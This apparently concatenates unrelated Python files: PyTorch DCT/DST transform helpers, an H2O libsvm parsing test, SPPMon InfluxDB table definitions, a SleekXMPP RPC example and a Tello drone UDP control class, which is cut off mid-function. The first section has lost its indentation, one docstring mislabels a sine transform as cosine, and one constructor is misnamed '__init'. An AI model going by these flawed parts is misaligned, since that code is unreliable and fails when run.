def idst(x, expkp1=None):
""" Batch Inverse Discrete Sine Transformation without normalization to coefficients.
Compute y_u = \sum_i x_i cos(pi*(2u+1)*i/(2N)),
    Implements the 2N padding trick to solve IDCT with IFFT in the following link,
https://github.com/tensorflow/tensorflow/blob/r1.10/tensorflow/python/ops/spectral_ops.py
1. Multiply by 2*exp(1j*pi*u/(2N))
2. Pad x by zeros
3. Perform IFFT
4. Extract the real part
"""
# last dimension
N = x.size(-1)
if expkp1 is None:
expkp1 = get_expkp1(N, dtype=x.dtype, device=x.device)
# multiply by 2*exp(1j*pi*u/(2N))
x_pad = x.unsqueeze(-1).mul(expkp1)
# pad second last dimension, excluding the complex number dimension
x_pad = F.pad(x_pad, (0, 0, 0, N), 'constant', 0)
if len(x.size()) == 1:
x_pad.unsqueeze_(0)
# the last dimension here becomes -2 because complex numbers introduce a new dimension
y = torch.irfft(x_pad, signal_ndim=1, normalized=False, onesided=False, signal_sizes=[2*N])[..., 1:N+1]
y.mul_(N)
if len(x.size()) == 1:
y.squeeze_(0)
return y
def idxt(x, cos_or_sin_flag, expk=None):
""" Batch Inverse Discrete Cosine Transformation without normalization to coefficients.
Compute y_u = \sum_i x_i cos(pi*(2u+1)*i/(2N)),
    Implements the 2N padding trick to solve IDCT with IFFT in the following link,
https://github.com/tensorflow/tensorflow/blob/r1.10/tensorflow/python/ops/spectral_ops.py
1. Multiply by 2*exp(1j*pi*u/(2N))
2. Pad x by zeros
3. Perform IFFT
4. Extract the real part
@param x batch 1D tensor for conversion
@param cos_or_sin_flag 0 for cosine tranformation and 1 or sine transformation
@param expk 2*exp(j*pi*k/(2N))
"""
# last dimension
N = x.size(-1)
if expk is None:
expk = get_expk(N, dtype=x.dtype, device=x.device)
# multiply by 2*exp(1j*pi*u/(2N))
x_pad = x.unsqueeze(-1).mul(expk)
# pad second last dimension, excluding the complex number dimension
x_pad = F.pad(x_pad, (0, 0, 0, N), 'constant', 0)
if len(x.size()) == 1:
x_pad.unsqueeze_(0)
# the last dimension here becomes -2 because complex numbers introduce a new dimension
# Must use IFFT here
y = torch.ifft(x_pad, signal_ndim=1, normalized=False)[..., 0:N, cos_or_sin_flag]
y.mul_(N)
if len(x.size()) == 1:
y.squeeze_(0)
return y
def dct2_2N(x, expk0=None, expk1=None):
""" Batch 2D Discrete Cosine Transformation without normalization to coefficients.
Compute 1D DCT twice.
@param x batch tensor, the 2D part is MxN
@param expk0 with length M
@param expk1 with length N
"""
return dct_2N(dct_2N(x.transpose(dim0=-2, dim1=-1), expk0).transpose_(dim0=-2, dim1=-1), expk1)
def dct2_N(x, perm0=None, expk0=None, perm1=None, expk1=None):
""" Batch 2D Discrete Cosine Transformation without normalization to coefficients.
Compute 1D DCT twice.
@param x batch tensor, the 2D part is MxN
@param perm0 with length M
@param expk0 with length M
@param perm1 with length N
@param expk1 with length N
"""
return dct_N(dct_N(x.transpose(dim0=-2, dim1=-1), perm=perm0, expk=expk0).transpose_(dim0=-2, dim1=-1), perm=perm1, expk=expk1)
def idct2_2N(x, expk0=None, expk1=None):
""" Batch 2D Discrete Cosine Transformation without normalization to coefficients.
Compute 1D DCT twice.
@param x batch tensor, the 2D part is MxN
@param expk0 with length M
@param expk1 with length N
"""
return idct_2N(idct_2N(x.transpose(dim0=-2, dim1=-1), expk0).transpose_(dim0=-2, dim1=-1), expk1)
def idct2_N(x, expk0=None, expk1=None):
""" Batch 2D Discrete Cosine Transformation without normalization to coefficients.
Compute 1D DCT twice.
@param x batch tensor, the 2D part is MxN
@param expk0 with length M
@param expk1 with length N
"""
return idct_N(idct_N(x.transpose(dim0=-2, dim1=-1), expk0).transpose_(dim0=-2, dim1=-1), expk1)
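# Illustrative 2D usage (added sketch; assumes x is an MxN float tensor):
#   y = dct2_N(x)    # applies the 1D transform along both of the last two dimensions
#   z = idct2_N(y)   # inverse 2D transform, up to the scaling of these unnormalized routines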
def dst2(x, expkp1_0=None, expkp1_1=None):
""" Batch 2D Discrete Sine Transformation without normalization to coefficients.
Compute 1D DST twice.
@param x batch tensor, the 2D part is MxN
@param expkp1_0 with length M
@param expkp1_1 with length N
"""
return dst(dst(x.transpose(dim0=-2, dim1=-1), expkp1_0).transpose_(dim0=-2, dim1=-1), expkp1_1)
def idcct2(x, expk_0=None, expk_1=None):
""" Batch 2D Inverse Discrete Cosine-Cosine Transformation without normalization to coefficients.
It computes following equation, which is slightly different from standard DCT formulation.
y_{u, v} = \sum_p \sum_q x_{p, q} cos(pi/M*p*(u+0.5)) cos(pi/N*q*(v+0.5))
Compute 1D DCT twice.
@param x batch tensor, the 2D part is MxN
@param expk_0 with length M, 2*exp(-1j*pi*k/(2M))
@param expk_1 with length N, 2*exp(-1j*pi*k/(2N))
"""
return idxt(idxt(x, 0, expk_1).transpose_(dim0=-2, dim1=-1), 0, expk_0).transpose(dim0=-2, dim1=-1)
# return idxt(idxt(x.transpose(dim0=-2, dim1=-1), 0, expk_0).transpose_(dim0=-2, dim1=-1), 0, expk_1)
def idsct2(x, expk_0=None, expk_1=None):
""" Batch 2D Inverse Discrete Sine-Cosine Transformation without normalization to coefficients.
It computes following equation, which is slightly different from standard DCT formulation.
y_{u, v} = \sum_p \sum_q x_{p, q} sin(pi/M*p*(u+0.5)) cos(pi/N*q*(v+0.5))
Compute 1D DST and then 1D DCT.
@param x batch tensor, the 2D part is MxN
@param expk_0 with length M, 2*exp(-1j*pi*k/(2M))
@param expk_1 with length N, 2*exp(-1j*pi*k/(2N))
"""
return idxt(idxt(x, 0, expk_1).transpose_(dim0=-2, dim1=-1), 1, expk_0).transpose_(dim0=-2, dim1=-1)
# return idxt(idxt(x.transpose(dim0=-2, dim1=-1), 1, expk_0).transpose_(dim0=-2, dim1=-1), 0, expk_1)
def idcst2(x, expk_0=None, expk_1=None):
""" Batch 2D Inverse Discrete Cosine-Sine Transformation without normalization to coefficients.
It computes following equation, which is slightly different from standard DCT formulation.
y_{u, v} = \sum_p \sum_q x_{p, q} cos(pi/M*p*(u+0.5)) sin(pi/N*q*(v+0.5))
Compute 1D DCT and then 1D DST.
@param x batch tensor, the 2D part is MxN
@param expk_0 with length M, 2*exp(-1j*pi*k/(2M))
@param expk_1 with length N, 2*exp(-1j*pi*k/(2N))
"""
return idxt(idxt(x, 1, expk_1).transpose_(dim0=-2, dim1=-1), 0, expk_0).transpose_(dim0=-2, dim1=-1)
# return idxt(idxt(x.transpose(dim0=-2, dim1=-1), 0, expk_0).transpose_(dim0=-2, dim1=-1), 1, expk_1)
def idxst_idct(x, expk_0=None, expk_1=None):
'''
Batch 2D Inverse Discrete Sine-Cosine Transformation without normalization to coefficients.
Compute idxst(idct(x))
@param x batch tensor, the 2D part is MxN
@param expk_0 with length M, 2*exp(-1j*pi*k/(2M))
@param expk_1 with length N, 2*exp(-1j*pi*k/(2N))
'''
return idxt(idct_N(x, expk_1).transpose_(dim0=-2, dim1=-1), 1, expk_0).transpose_(dim0=-2, dim1=-1)
def idct_idxst(x, expk_0=None, expk_1=None):
'''
Batch 2D Inverse Discrete Cosine-Sine Transformation without normalization to coefficients.
Compute idct(idxst(x)).
@param x batch tensor, the 2D part is MxN
@param expk_0 with length M, 2*exp(-1j*pi*k/(2M))
@param expk_1 with length N, 2*exp(-1j*pi*k/(2N))
'''
return idct_N(idxt(x, 1, expk_1).transpose_(dim0=-2, dim1=-1), expk_0).transpose_(dim0=-2, dim1=-1)
| 2.484375 | 2 |
py/testdir_multi_jvm/test_many_fp_formats_libsvm_2.py | vkuznet/h2o | 0 | 1226 | <reponame>vkuznet/h2o
import unittest, random, sys, time
sys.path.extend(['.','..','py'])
import h2o, h2o_cmd, h2o_hosts, h2o_browse as h2b, h2o_import as h2i, h2o_exec as h2e, h2o_glm
import h2o_util
zeroList = [
'Result0 = 0',
]
# the first column should use this
exprList = [
'Result<n> = sum(<keyX>[<col1>])',
]
DO_SUMMARY = False
DO_COMPARE_SUM = False
def write_syn_dataset(csvPathname, rowCount, colCount, SEEDPERFILE, sel, distribution):
# we can do all sorts of methods off the r object
r = random.Random(SEEDPERFILE)
def addRandValToRowStuff(colNumber, valMin, valMax, rowData, synColSumDict):
# colNumber should not be 0, because the output will be there
## val = r.uniform(MIN,MAX)
val = r.triangular(valMin,valMax,0)
valFormatted = h2o_util.fp_format(val, sel)
# force it to be zero in this range. so we don't print zeroes for svm!
if (val > valMin/2) and (val < valMax/2):
return None
else:
rowData.append(str(colNumber) + ":" + valFormatted) # f should always return string
if colNumber in synColSumDict:
synColSumDict[colNumber] += val # sum of column (dict)
else:
synColSumDict[colNumber] = val # sum of column (dict)
return val
valMin = -1e2
valMax = 1e2
classMin = -36
classMax = 36
dsf = open(csvPathname, "w+")
synColSumDict = {0: 0} # guaranteed to have col 0 for output
# even though we try to get a max colCount with random, we might fall short
# track what max we really got
colNumberMax = 0
for i in range(rowCount):
rowData = []
d = random.randint(0,2)
if d==0:
if distribution == 'sparse':
# only one value per row!
# is it okay to specify col 0 in svm? where does the output data go? (col 0)
colNumber = random.randint(1, colCount)
val = addRandValToRowStuff(colNumber, valMin, valMax, rowData, synColSumDict)
# did we add a val?
if val and (colNumber > colNumberMax):
colNumberMax = colNumber
else:
# some number of values per row.. 50% or so?
for colNumber in range(1, colCount+1):
val = addRandValToRowStuff(colNumber, valMin, valMax, rowData, synColSumDict)
if val and (colNumber > colNumberMax):
colNumberMax = colNumber
# always need an output class, even if no cols are non-zero
# space is the only valid separator
# add the output (col 0)
# random integer for class
val = random.randint(classMin,classMax)
rowData.insert(0, val)
synColSumDict[0] += val # sum of column (dict)
rowDataCsv = " ".join(map(str,rowData))
# FIX! vary the eol ?
# randomly skip some rows. only write 1/3
dsf.write(rowDataCsv + "\n")
dsf.close()
return (colNumberMax, synColSumDict)
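# Each generated row follows the libsvm/SVMLight layout (illustrative, values are random):
#   <class> <col>:<value> <col>:<value> ...
# e.g. "12 3:87.5 41:-63.2"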
class Basic(unittest.TestCase):
def tearDown(self):
h2o.check_sandbox_for_errors()
@classmethod
def setUpClass(cls):
global SEED, localhost
SEED = h2o.setup_random_seed()
localhost = h2o.decide_if_localhost()
if (localhost):
h2o.build_cloud(2,java_heap_GB=5)
else:
h2o_hosts.build_cloud_with_hosts()
@classmethod
def tearDownClass(cls):
h2o.tear_down_cloud()
def test_many_fp_formats_libsvm_2(self):
# h2b.browseTheCloud()
SYNDATASETS_DIR = h2o.make_syn_dir()
tryList = [
(100, 10000, 'cA', 300, 'sparse50'),
(100, 10000, 'cB', 300, 'sparse'),
# (100, 40000, 'cC', 300, 'sparse50'),
# (100, 40000, 'cD', 300, 'sparse'),
]
# h2b.browseTheCloud()
for (rowCount, colCount, hex_key, timeoutSecs, distribution) in tryList:
NUM_CASES = h2o_util.fp_format()
for sel in [random.randint(0,NUM_CASES-1)]: # len(caseList)
SEEDPERFILE = random.randint(0, sys.maxint)
csvFilename = "syn_%s_%s_%s_%s.csv" % (SEEDPERFILE, sel, rowCount, colCount)
csvPathname = SYNDATASETS_DIR + '/' + csvFilename
print "Creating random", csvPathname
# dict of col sums for comparison to exec col sums below
(colNumberMax, synColSumDict) = write_syn_dataset(csvPathname, rowCount, colCount, SEEDPERFILE, sel, distribution)
selKey2 = hex_key + "_" + str(sel)
print "This dataset requires telling h2o parse it's a libsvm..doesn't detect automatically"
parseResult = h2i.import_parse(path=csvPathname, schema='put', hex_key=selKey2,
timeoutSecs=timeoutSecs, doSummary=False, parser_type='SVMLight')
print csvFilename, 'parse time:', parseResult['response']['time']
print "Parse result['destination_key']:", parseResult['destination_key']
inspect = h2o_cmd.runInspect(None, parseResult['destination_key'], max_column_display=colNumberMax+1, timeoutSecs=timeoutSecs)
num_cols = inspect['num_cols']
num_rows = inspect['num_rows']
print "\n" + csvFilename
# SUMMARY****************************************
# gives us some reporting on missing values, constant values,
# to see if we have x specified well
# figures out everything from parseResult['destination_key']
# needs y to avoid output column (which can be index or name)
                # assume all the configs have the same y..just check with the first one
goodX = h2o_glm.goodXFromColumnInfo(y=0,
key=parseResult['destination_key'], timeoutSecs=300, noPrint=True)
if DO_SUMMARY:
summaryResult = h2o_cmd.runSummary(key=selKey2, max_column_display=colNumberMax+1, timeoutSecs=timeoutSecs)
h2o_cmd.infoFromSummary(summaryResult, noPrint=True)
self.assertEqual(colNumberMax+1, num_cols, msg="generated %s cols (including output). parsed to %s cols" % (colNumberMax+1, num_cols))
# Exec (column sums)*************************************************
if DO_COMPARE_SUM:
h2e.exec_zero_list(zeroList)
colResultList = h2e.exec_expr_list_across_cols(None, exprList, selKey2, maxCol=colNumberMax+1,
timeoutSecs=timeoutSecs)
print "\n*************"
print "colResultList", colResultList
print "*************"
self.assertEqual(rowCount, num_rows, msg="generated %s rows, parsed to %s rows" % (rowCount, num_rows))
# need to fix this for compare to expected
# we should be able to keep the list of fp sums per col above
# when we generate the dataset
### print "\nsynColSumDict:", synColSumDict
for k,v in synColSumDict.iteritems():
if DO_COMPARE_SUM:
# k should be integers that match the number of cols
self.assertTrue(k>=0 and k<len(colResultList))
compare = colResultList[k]
print "\nComparing col sums:", v, compare
# Even though we're comparing floating point sums, the operations probably should have
# been done in same order, so maybe the comparison can be exact (or not!)
self.assertAlmostEqual(v, compare, places=0,
msg='%0.6f col sum is not equal to expected %0.6f' % (v, compare))
synMean = (v + 0.0)/rowCount
# enums don't have mean, but we're not enums
mean = float(inspect['cols'][k]['mean'])
# our fp formats in the syn generation sometimes only have two places?
self.assertAlmostEqual(mean, synMean, places=0,
msg='col %s mean %0.6f is not equal to generated mean %0.6f' % (k, mean, synMean))
num_missing_values = inspect['cols'][k]['num_missing_values']
self.assertEqual(0, num_missing_values,
msg='col %s num_missing_values %d should be 0' % (k, num_missing_values))
if __name__ == '__main__':
h2o.unit_main()
| 2.125 | 2 |
python/influx/database_tables.py | SA-22C-smoothswing/spectrum-protect-sppmon | 0 | 1227 | <filename>python/influx/database_tables.py
"""Provides all database and table structures used for the influx database.
Classes:
Datatype
Database
Table
RetentionPolicy
"""
from __future__ import annotations
from enum import Enum, unique
import re
import json
from typing import Any, Dict, List, Set, Tuple, Union
import influx.influx_queries as Queries
from utils.execption_utils import ExceptionUtils
from utils.influx_utils import InfluxUtils
from utils.spp_utils import SppUtils
@unique
class Datatype(Enum):
"""
This enum differentiates between the different Influx-Types.
By declaring the type SPPMon will automatically insert the data in the right format.
The order of the types within the enum is important: bool is a int, but a int is not a bool.
    Important: only use `TIMESTAMP` for epoch timestamps, *NOT* for durations or counts.
    `TIMESTAMP` values are automatically converted into second format.
Note: The return type is just a helper and not of a big use.
Methods:
get_auto_datatype - get Datatype enum by value typ analysis
"""
NONE = type(None)
"""Undeclared, only use as a placeholder."""
STRING = str
"""Special symbols and \" will be escaped."""
BOOL = bool
"""Any boolean, be aware it is a subtype of int.
TODO Untested, saves as Boolean within Influx.
"""
INT = int
"""Appends a 'i' at end of number to declare. Fails if the data is mixed with any other type."""
FLOAT = float
"""Unchanged value. Default Influx numeric data type. Mixing with ints works."""
TIMESTAMP = type(int)
"""Automatic transform a timestamp into seconds. Important: Only use for Epoch timestamps, not duration or counter.
Caution: Type is just a placeholder, do not set to int - causing problems!
"""
@staticmethod
def get_auto_datatype(value: Any) -> Datatype:
"""get Datatype enum by value typ analysis. Usage should be avoided.
Only use if no datatype is declared. It skips time-type and fails if ints are mixed with floats.
If no type is detected emits a warning and returns `NONE`.
Arguments:
value {Union[str, float, int, bool, None]} -- Value to be analyzed
Returns:
Datatype -- type of value or `NONE`.
"""
for enum in Datatype:
if(enum is Datatype.TIMESTAMP):
continue
if(isinstance(value, enum.value)):
return enum
ExceptionUtils.error_message(f"No auto type found for {value}")
return Datatype.NONE
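# Illustrative behaviour of the member order (added sketch, not part of the original module):
#   Datatype.get_auto_datatype(True)  -> Datatype.BOOL   (checked before INT, since bool is a subtype of int)
#   Datatype.get_auto_datatype(3)     -> Datatype.INT
#   Datatype.get_auto_datatype(3.5)   -> Datatype.FLOAT
#   Datatype.get_auto_datatype("abc") -> Datatype.STRING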
class RetentionPolicy:
"""Represents a influxdb retention policy.
By this policy it is declared afer which ammount of time a dataset is deleted from the DB.
Attributes
name - name of RP
database - associated database
duration - time until the data is purged
        replication - How often the data is replicated
shard_duration - Size of memory-groups
default - whether this is the default RP
Methods
to_dict - creates a dict out of the values
"""
@property
def name(self) -> str:
"""name of the Retention Policy"""
return self.__name
@property
def database(self) -> Database:
"""associated database"""
return self.__database
@property
def duration(self) -> str:
"""time until the data is purged"""
return self.__duration
@property
def replication(self) -> int:
"""How often the date is replicated. We only have 1 db instance so replication is always 1"""
return self.__replication
@property
def shard_duration(self) -> str:
"""Size of memory-groups. Default time is 0s, then the db decides what to take"""
return self.__shard_duration
@property
def default(self) -> bool:
""" whether this is the default RP"""
return self.__default
def __init__(self, name: str, database: Database, duration: str,
replication: int = 1, shard_duration: str = "0s",
default: bool = False) -> None:
if(not name):
raise ValueError("need retention policy name for creation")
if(not database):
raise ValueError("need retention policy database for creation")
if(not duration):
raise ValueError("need retention policy duration for creation")
if(not replication):
raise ValueError("need retention policy replication factor for creation")
if(not shard_duration):
raise ValueError("need retention policy shard duration for creation")
if(default is None):
raise ValueError("need retention policy default setting for creation")
self.__name = name
self.__database = database
self.__replication = replication
self.__shard_duration = shard_duration
self.__default = default
try:
# str due usage of method
self.__duration: str = InfluxUtils.transform_time_literal(duration, single_vals=False)
except ValueError as error:
ExceptionUtils.exception_info(error)
raise ValueError(f"duration for retention policy {name} is not in the correct time format")
try:
# str due usage of method
self.__shard_duration: str = InfluxUtils.transform_time_literal(shard_duration, single_vals=False)
except ValueError as error:
ExceptionUtils.exception_info(error)
raise ValueError(f"shard duration for retention policy {name} is not in the correct time format")
def to_dict(self) -> Dict[str, Union[str, int, bool]]:
"""Used to create a dict out of the values, able to compare to influxdb-created dict"""
return {
'name': self.name,
'duration': self.duration,
'shardGroupDuration': self.__shard_duration,
'replicaN': self.__replication,
'default': self.default
}
def __str__(self) -> str:
return f"{self.database.name}.{self.name}"
def __repr__(self) -> str:
return f"Retention Policy: {self.name}"
def __eq__(self, o: object) -> bool:
if(isinstance(o, RetentionPolicy)):
return o.to_dict() == self.to_dict()
return False
def __hash__(self) -> int:
return hash(json.dumps(self.to_dict(), sort_keys=True))
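# Illustrative construction (added sketch; the duration literal and names are assumptions):
#   rp = RetentionPolicy(name="autogen", database=my_db, duration="90d", default=True)
#   rp.to_dict()  # shape matches what influxdb reports for its retention policies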
class Table:
"""Represents a measurement in influx. Contains pre-defined tag and field definitions.
Attributes
name - name of table
fields - dict of field name with datatype
tags - tags as list of str
time_key - key name of the timestamp field
retention_policy - retention policy associated with this table
database - table is declared within this database
Methods
split_by_table_def - Split the given dict into a pre-defined set of tags, fields and a timestamp.
"""
@property
def fields(self) -> Dict[str, Datatype]:
"""fields of the table, name is key, value is datatype"""
return self.__fields
@property
def tags(self) -> List[str]:
"""tags of the table, datatype always string"""
return self.__tags
@property
def time_key(self) -> str:
"""name of the timestamp key"""
return self.__time_key
@property
def name(self) -> str:
"""name of the table"""
return self.__name
@property
def retention_policy(self) -> RetentionPolicy:
"""retention policy associated with this table"""
return self.__retention_policy
@property
def database(self) -> Database:
"""table is declared within this database"""
return self.__database
__bad_measurement_characters: List[str] = [' ', ',']
"""those chars need to be escaped within a measurement/table name"""
def __init__(self, database: Database, name: str, fields: Dict[str, Datatype] = None,
tags: List[str] = None, time_key: str = 'time', retention_policy: RetentionPolicy = None) -> None:
if(not database):
raise ValueError("need database to create table")
if(not name):
raise ValueError("need str name to create table")
if(not time_key):
raise ValueError("time key cannot be None")
if(not fields):
fields = {}
if(not tags):
tags = []
if(not retention_policy):
retention_policy = next(filter(lambda rp: rp.default, database.retention_policies))
self.__database: Database = database
self.__fields: Dict[str, Datatype] = fields
self.__tags: List[str] = tags
self.__time_key: str = time_key
self.__retention_policy = retention_policy
# escape not allowed characters in Measurement
for bad_character in self.__bad_measurement_characters:
if(re.search(bad_character, name)):
name = name.replace(bad_character, '\\%c'% bad_character)
self.__name: str = name
def __str__(self) -> str:
return f"{self.database.name}.{self.retention_policy.name}.{self.name}"
def __repr__(self) -> str:
return f"Table: {self.name}"
def split_by_table_def(self, mydict: Dict[str, Any]) -> Tuple[
Dict[str, Any], Dict[str, Any], Union[str, int, None]]:
"""Split the given dict into a pre-defined set of tags, fields and a timestamp.
None-Values and empty strings are ignored.
If there are no fields declared, it will split by a default pattern.
        Undeclared columns will produce a warning.
        This function uses the tag/field and timestamp definition declared within this table.
Arguments:
self {Table} -- Table with predefined set of tags and fields
            mydict {Dict[str, Any]} -- dict with columns as keys. None-Values are ignored
Raises:
ValueError: If no dict is given or not of type dict.
Returns:
(Dict[str, Any], Dict[str, Any], int) -- Tuple of: tags, fields, timestamp
"""
if(not mydict):
raise ValueError("need at least one value in dict to split")
# if table is not defined use default split
if(not self.fields):
return InfluxUtils.default_split(mydict=mydict)
# fill dicts
# table.fields is a dict, we only need the keys
fields: Dict[str, Any] = dict.fromkeys(self.fields.keys(), None)
tags: Dict[str, Any] = dict.fromkeys(self.tags, None)
# what field should be recorded as time
time_stamp_field = self.time_key
# helper variable to only overwrite if it is not the time_stamp_field
time_overwrite_allowed = True
        # actual timestamp that gets saved
time_stamp: Union[str, int, None] = None
for (key, value) in mydict.items():
            # Ignore empty entries
if(value is None or (isinstance(value, str) and not value)):
continue
# Check timestamp value if it matches any of predefined time names
if(key in time_stamp_field or key in InfluxUtils.time_key_names):
# sppmonCTS has lowest priority, only set if otherwise None
if(time_stamp is None and key == SppUtils.capture_time_key):
time_stamp = value
# time_stamp_field is highest priority. Do not overwrite it.
elif(key is time_stamp_field):
time_overwrite_allowed: bool = False
time_stamp = value
# if time_stamp_field is not used yet, overwrite sppmonCaptureTime or others
elif(time_overwrite_allowed):
time_stamp = value
# if no overwrite allowed, continue and drop field
else:
continue
# Otherwise check for Keys or Fields
if(key in fields):
fields[key] = value
elif(key in tags):
tags[key] = value
elif(key in InfluxUtils.time_key_names or key in time_stamp_field):
continue
else:
ExceptionUtils.error_message(f"Not all columns for table {self.name} are declared: {key}")
                # previously appended key+"MISSING"; removed to avoid an endless error loop on repeated queries.
fields[key] = value
return (tags, fields, time_stamp)
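# Illustrative split (added sketch; the table/field names below are hypothetical):
# for a table declared with fields={'cpu': Datatype.FLOAT}, tags=['host'], time_key='logTime',
#   table.split_by_table_def({'host': 'node1', 'cpu': 0.7, 'logTime': 1600000000})
# would return roughly
#   ({'host': 'node1'}, {'cpu': 0.7}, 1600000000)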
class Database:
"""
    Represents an instance of an influx database. Define all table definitions within the init method.
Attributes
name - name of the database
tables - tables with predefined tags & fields
retention_policies - Set of all provided Retention Policies
continuous_queries - Set of all provided Continuous Queries
Methods
__getitem__ - [] access on the tables via name. Creates empty table if missing.
"""
@property
def tables(self) -> Dict[str, Table]:
"""Dict with table definitions to look up"""
return self.__tables
@property
def retention_policies(self) -> Set[RetentionPolicy]:
"""Set of all provided Retention Policies"""
return self.__retention_policies
@property
def continuous_queries(self) -> Set[Queries.ContinuousQuery]:
"""Set of all provided Continuous Queries"""
return self.__continuous_queries
@property
def name(self) -> str:
"""name of the database, also used as reference"""
return self.__name
def __getitem__(self, table_name: str) -> Table:
"""Aquire a instance of a predefined table, returns a empty table if it was not defined. []-Access.
Arguments:
            table_name {str} -- name of the table you want to acquire
Returns:
Table -- Instance of a predefined table, otherwise new empty table
"""
return self.tables.get(table_name, Table(self, table_name))
def __str__(self) -> str:
return self.name
def __repr__(self) -> str:
return f'Database: {self.name}'
def __init__(self, name: str):
self.__name: str = name
self.__tables: Dict[str, Table] = {}
self.__retention_policies: Set[RetentionPolicy] = set()
self.__continuous_queries: Set[Queries.ContinuousQuery] = set()
| 3.046875 | 3 |
examples/rpc_server_side.py | calendar42/SleekXMPP--XEP-0080- | 1 | 1228 | <gh_stars>1-10
"""
SleekXMPP: The Sleek XMPP Library
Copyright (C) 2011 <NAME>
This file is part of SleekXMPP.
See the file LICENSE for copying permission.
"""
from sleekxmpp.plugins.xep_0009.remote import Endpoint, remote, Remote, \
ANY_ALL
import threading
class Thermostat(Endpoint):
def FQN(self):
return 'thermostat'
def __init(self, initial_temperature):
self._temperature = initial_temperature
self._event = threading.Event()
@remote
def set_temperature(self, temperature):
print("Setting temperature to %s" % temperature)
self._temperature = temperature
@remote
def get_temperature(self):
return self._temperature
@remote(False)
def release(self):
self._event.set()
def wait_for_release(self):
self._event.wait()
def main():
session = Remote.new_session('[email protected]/rpc', '*****')
thermostat = session.new_handler(ANY_ALL, Thermostat, 18)
thermostat.wait_for_release()
session.close()
if __name__ == '__main__':
main()
| 1.859375 | 2 |
lib/TelloAPI.py | wuhuikai/DeepDrone | 1 | 1229 | import cv2
import time
import socket
import threading
class Response(object):
def __init__(self):
pass
def recv(self, data):
pass
def pop(self):
pass
def empty(self):
pass
class Command(Response):
def __init__(self):
super(Command, self).__init__()
self.response = None
self.lock = threading.RLock()
def recv(self, data):
with self.lock:
self.response = data.decode('utf-8')
def pop(self):
with self.lock:
response, self.response = self.response, None
return response
def empty(self):
with self.lock:
return self.response is None
class State(Response):
def __init__(self):
super(State, self).__init__()
self.response = {}
self.lock = threading.RLock()
def recv(self, data):
with self.lock:
self.response = {item.split(':')[0]:float(item.split(':')[1]) for item in data.decode('utf-8').split(';') if ':' in item}
def pop(self):
return self.response
def empty(self):
return False
class Client(object):
def __init__(self, local_port, buffer_size, daemon, response):
self.response = response
self.buffer_size = buffer_size
self.socket = socket.socket(socket.AF_INET, socket.SOCK_DGRAM)
self.socket.bind(('', local_port))
self.receive_thread = threading.Thread(target=self._receive_thread)
self.receive_thread.daemon = daemon
self.receive_thread.start()
def __del__(self):
"""Closes the local socket."""
self.socket.close()
def _receive_thread(self):
"""Listens for responses from the Tello.
Runs as a thread, sets self.response to whatever the Tello last returned.
"""
while True:
try:
self.response.recv(self.socket.recv(self.buffer_size))
except Exception as e:
print(e)
break
def empty(self):
return self.response.empty()
def pop(self):
return self.response.pop()
class Video(object):
def __init__(self, daemon=True):
self.video = cv2.VideoCapture('udp://@0.0.0.0:11111')
if not self.video.isOpened():
raise RuntimeError('Failed to connect to Tello')
self.frame = None
self.lock = threading.RLock()
self.thread = threading.Thread(target=self._update_thread)
self.thread.daemon = daemon
self.thread.start()
def __del__(self):
self.video.release()
def _update_thread(self):
while True:
ok, frame = self.video.read()
if ok:
with self.lock:
self.frame = frame
def empty(self):
with self.lock:
return self.frame is None
def pop(self):
with self.lock:
frame, self.frame = self.frame, None
return frame
class Tello(object):
def __init__(self, local_port=9999, command_timeout=0.35, state=True, video=True):
"""Connects to Tello in command mode.
Args:
local_port (int): port of local machine for receiving command response.
command_timeout (float): seconds to wait for a response of command.
state (bool): receive state from Tello?
video (bool): receive video from Tello?
Raises:
RuntimeError: If the Tello rejects the attempt to enter command mode or open the video stream.
"""
self.command_timeout = command_timeout
self.response_client = Client(local_port, 1024, True, Command())
self.state_client = Client(8890, 1024, True, State()) if state else None
self.tello_address = ('192.168.10.1', 8889)
self.enter_command_mode()
self.video_client = None
if video:
self.open_video_stream()
self.video_client = Video(True)
def send_command(self, command, with_return=True):
"""Sends a command to the Tello and waits for a response.
If self.command_timeout is exceeded before a response is received,
a RuntimeError exception is raised.
Args:
command (str): Command to send.
Returns:
str: Response from Tello.
Raises:
RuntimeError: If no response is received within self.timeout seconds.
"""
self.response_client.pop()
self.response_client.socket.sendto(command.encode('utf-8'), self.tello_address)
if not with_return:
return
st = time.time()
while self.response_client.empty():
if time.time() - st >= self.command_timeout:
raise RuntimeError('No response to command')
return self.response_client.pop()
def state(self):
return self.state_client.pop() if self.state_client else None
def read_frame(self):
if self.video_client is None:
raise RuntimeError('Video is not available')
while self.video_client.empty():
pass
return self.video_client.pop()
def enter_command_mode(self):
if self.send_command('command') != 'ok':
raise RuntimeError('Tello rejected the attempt to enter command mode')
def take_off(self):
"""
return: 'ok' or 'error'
"""
return self.send_command('takeoff')
def land(self):
"""
return: 'ok' or 'error'
"""
return self.send_command('land')
def open_video_stream(self):
if self.send_command('streamon') != 'ok':
raise RuntimeError('Tello rejected to open the video stream')
def close_video_stream(self):
"""
return: 'ok' or 'error'
"""
return self.send_command('streamoff')
def emergency_shutdown(self):
"""
return: 'ok' or 'error'
"""
return self.send_command('emergency')
def move_up(self, x, with_return=False):
"""
param x: int, [20, 500]
param with_return: bool
return: 'ok' or 'error'
"""
return self.send_command('up {}'.format(x), with_return)
def move_down(self, x, with_return=False):
"""
param x: int, [20, 500]
param with_return: bool
return: 'ok' or 'error'
"""
return self.send_command('down {}'.format(x), with_return)
def move_left(self, x, with_return=False):
"""
param x: int, [20, 500]
param with_return: bool
return: 'ok' or 'error'
"""
return self.send_command('left {}'.format(x), with_return)
def move_right(self, x, with_return=False):
"""
param x: int, [20, 500]
param with_return: bool
return: 'ok' or 'error'
"""
return self.send_command('right {}'.format(x), with_return)
def move_forward(self, x, with_return=False):
"""
param x: int, [20, 500]
param with_return: bool
return: 'ok' or 'error'
"""
return self.send_command('forward {}'.format(x), with_return)
def move_backward(self, x, with_return=False):
"""
param x: int, [20, 500]
param with_return: bool
return: 'ok' or 'error'
"""
return self.send_command('back {}'.format(x), with_return)
def rotate_clockwise(self, x, with_return=False):
"""
param x: int, [1, 3600]
param with_return: bool
return: 'ok' or 'error'
"""
return self.send_command('cw {}'.format(x), with_return)
def rotate_counter_clockwise(self, x, with_return=False):
"""
param x: int, [1, 3600]
param with_return: bool
return: 'ok' or 'error'
"""
return self.send_command('ccw {}'.format(x), with_return)
def flip_left(self, with_return=False):
"""
param with_return: bool
return: 'ok' or 'error'
"""
return self.send_command('flip l', with_return)
def flip_right(self, with_return=False):
"""
param with_return: bool
return: 'ok' or 'error'
"""
